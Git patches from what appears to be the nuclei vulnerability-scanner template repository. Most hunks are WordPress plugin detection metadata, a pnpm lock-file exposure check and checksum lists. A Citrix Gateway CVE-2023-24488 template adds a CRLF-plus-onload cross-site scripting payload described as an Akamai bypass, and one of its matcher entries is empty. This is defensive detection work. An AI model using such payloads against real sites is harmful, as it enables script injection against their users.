b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 773d7099803be48ef7c7154afe4240332fe7c61a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:35:20 +0530 Subject: [PATCH 312/609] Update and rename pnpm-pnpm-lock-yaml.yaml to pnpm-lock.yaml --- exposures/files/pnpm-lock.yaml | 34 ++++++++++++++++++++++++ exposures/files/pnpm-pnpm-lock-yaml.yaml | 33 ----------------------- 2 files changed, 34 insertions(+), 33 deletions(-) create mode 100644 exposures/files/pnpm-lock.yaml delete mode 100644 exposures/files/pnpm-pnpm-lock-yaml.yaml diff --git a/exposures/files/pnpm-lock.yaml b/exposures/files/pnpm-lock.yaml new file mode 100644 index 0000000000..67486109cd --- /dev/null +++ b/exposures/files/pnpm-lock.yaml @@ -0,0 +1,34 @@ +id: pnpm-lock + +info: + name: PNPM Lock Yaml File Disclosure + author: noraj + severity: info + description: | + The pnpm-lock.yaml file is similar to the package-lock.json file used by npm or the yarn.lock file used by Yarn. It serves as a lock file that ensures consistent and reproducible installations of dependencies across different environments. + reference: + - https://pnpm.io/cli/install#tldr + metadata: + max-request: 1 + verified: true + shodan-query: html:"pnpm-lock.yaml" + tags: exposure,files,node,npm,pnpm + +http: + - method: GET + path: + - "{{BaseURL}}/pnpm-lock.yaml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "lockfileVersion:" + - "specifiers:" + - "packages:" + condition: and + + - type: status + status: + - 200 diff --git a/exposures/files/pnpm-pnpm-lock-yaml.yaml b/exposures/files/pnpm-pnpm-lock-yaml.yaml deleted file mode 100644 index e82b8c0c28..0000000000 --- a/exposures/files/pnpm-pnpm-lock-yaml.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: pnpm-lock-yaml - -info: - name: pnpm pnpm-lock.yaml disclosure - author: noraj - severity: info - description: File automatically generated for any operations where pnpm modifies either the node_modules tree, or package.json. It's a lock file for package.json. - reference: - - https://pnpm.io/cli/install#tldr - tags: exposure,files - -requests: - - method: GET - path: - - "{{BaseURL}}/pnpm-lock.yaml" - - matchers-condition: and - matchers: - - type: word - words: - - "lockfileVersion" - - "specifiers" - - "dependencies" - condition: and - - - type: word - words: - - "application/yaml" - part: header - - - type: status - status: - - 200 From a56d970da7622d792372cf549c1812db7c88b760 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:36:22 +0530 Subject: [PATCH 313/609] Update and rename exposures/files/pnpm-lock.yaml to http/exposures/files/pnpm-lock.yaml --- {exposures => http/exposures}/files/pnpm-lock.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposures => http/exposures}/files/pnpm-lock.yaml (100%) diff --git a/exposures/files/pnpm-lock.yaml b/http/exposures/files/pnpm-lock.yaml similarity index 100% rename from exposures/files/pnpm-lock.yaml rename to http/exposures/files/pnpm-lock.yaml From 29984cf2ded615534c0caa4f0a7cc1bb05ece87d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 09:59:56 +0530 Subject: [PATCH 314/609] Update CVE-2023-24488.yaml --- http/cves/2023/CVE-2023-24488.yaml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index dad3fd6812..ebab836f1c 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -2,7 +2,7 @@ id: CVE-2023-24488 info: name: Citrix Gateway and Citrix ADC - Cross-Site Scripting - author: johnk3r + author: johnk3r,DhiyaneshDk severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. @@ -11,6 +11,7 @@ info: - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/ - https://nvd.nist.gov/vuln/detail/CVE-2023-24488 - https://twitter.com/infosec_au/status/1674786106381070342 + - https://twitter.com/bxmbn/status/1675250259608449026 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -24,12 +25,17 @@ info: http: - method: GET path: - - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a' + - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E' + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "")' - - 'contains(to_lower(body), "content-type: text/html")' - - 'status_code == 302' - condition: and \ No newline at end of file + - type: word + part: body + words: + - + - "Content-Type: text/html" + condition: and + + - type: status + status: + - 302 From 7b4da8e4fd84a5c62072262ea4bbacc3a5f61344 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:07:31 +0000 Subject: [PATCH 315/609] Auto Generated New Template Addition List [Tue Jul 4 05:07:31 UTC 2023] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index e13f63097c..ddf70e71bd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,6 @@ +file/webshell/asp-webshell.yaml +file/webshell/jsp-webshell.yaml +file/webshell/php-webshell.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/pritunl-panel.yaml From 4d0ebc8e78ae2fe1835583ad38dc6d02d50b6de2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:07:40 +0000 Subject: [PATCH 316/609] Auto Generated Templates Checksum [Tue Jul 4 05:07:40 UTC 2023] :robot: --- templates-checksum.txt | 419 +++++++++++++++++++++-------------------- 1 file changed, 211 insertions(+), 208 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 60ae88f6d4..0837de7724 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -157,6 +157,9 @@ file/nodejs/zip-path-overwrite.yaml:5957c54cf4b8885a0c1d5d3a0bb25357ac6f07f1 file/perl/perl-scanner.yaml:ca5cfa3bae68e00b77dc73989a6331995be0b54a file/php/php-scanner.yaml:bc0232813f7fcf4ea23d20cb004ee2f992cc6745 file/python/python-scanner.yaml:3774742345a3c2db504ab69a5a4f2e2584bb5ed3 +file/webshell/asp-webshell.yaml:b0284098b274456c7e028cb788afd9bd26bc30ae +file/webshell/jsp-webshell.yaml:4c5f4d1c414c8b7fba63db4651565ec747b3b015 +file/webshell/php-webshell.yaml:c33fb686c46b8211a18eaae52f0444bb73a107f2 file/xss/dom-xss.yaml:e43d8068f2bd1a7d2af72dac9974e57de29879c4 headless/dvwa-headless-automatic-login.yaml:99a6c2734ab061798627d79fda8ee538aa6060a8 headless/extract-urls.yaml:c2ff7a092991c2dee191e84ba4129270aacc8914 @@ -234,7 +237,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 helpers/wordpress/plugins/elementor.txt:aa47e8401f52058e8878f672b20bb4bbd6d570b6 -helpers/wordpress/plugins/elementskit-lite.txt:fd7189809f10f8d048cceae8bfbc391d319526a9 +helpers/wordpress/plugins/elementskit-lite.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e3b1c874b07e920f5092b34238b539c29b1e3578 @@ -247,13 +250,13 @@ helpers/wordpress/plugins/fluentform.txt:a832235a17d232a9abf36075ae469dee7e69ff3 helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 -helpers/wordpress/plugins/forminator.txt:bbaf47909306821eec059ce49a6349fa542bdd17 +helpers/wordpress/plugins/forminator.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:efa2314fd79dfeb6c6a4f1283847a5e31dbed204 helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 -helpers/wordpress/plugins/google-site-kit.txt:36783a832f727ead000f1bce63fd4a599fded929 +helpers/wordpress/plugins/google-site-kit.txt:744f0f894a0a521da213db9761fe60af501463a6 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 helpers/wordpress/plugins/gutenberg.txt:12a04d509e74f421d6249526e0000d4f5d6bd2ba @@ -307,7 +310,7 @@ helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111 helpers/wordpress/plugins/pixelyoursite.txt:d6ec1f7edbdfc1e01ffb78ab8d2025e5ae4a6e8c helpers/wordpress/plugins/polylang.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05d71f -helpers/wordpress/plugins/popup-maker.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c +helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe helpers/wordpress/plugins/post-smtp.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b311e9dfe helpers/wordpress/plugins/premium-addons-for-elementor.txt:9b2f4c3c25986436f50e7581b0398720d5de37be @@ -348,7 +351,7 @@ helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c47 helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 -helpers/wordpress/plugins/webp-converter-for-media.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 +helpers/wordpress/plugins/webp-converter-for-media.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 @@ -360,7 +363,7 @@ helpers/wordpress/plugins/woocommerce-payments.txt:eecaf8be5654f259a19f021dd696c helpers/wordpress/plugins/woocommerce-paypal-payments.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:d2c7dc39f7a599e653154733c2f9c606bee5474c helpers/wordpress/plugins/woocommerce-services.txt:5da596d45f9d6516efc24f110a7c87475a984016 -helpers/wordpress/plugins/woocommerce.txt:373a109947826f162ef5dba14dc054105c72c5ca +helpers/wordpress/plugins/woocommerce.txt:73c5ca4adedb4f1f54219028ac0ff4e52416c176 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:99023f12d2da25d516e16bc9f575d0e206f3d843 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 @@ -2629,7 +2632,7 @@ http/exposed-panels/dataiku-panel.yaml:ccc01376143bc524039ba721ba23d201055f3735 http/exposed-panels/davantis-panel.yaml:8e5295cc1d2a6ca2daf9aecb9edeb9c7bff6e17c 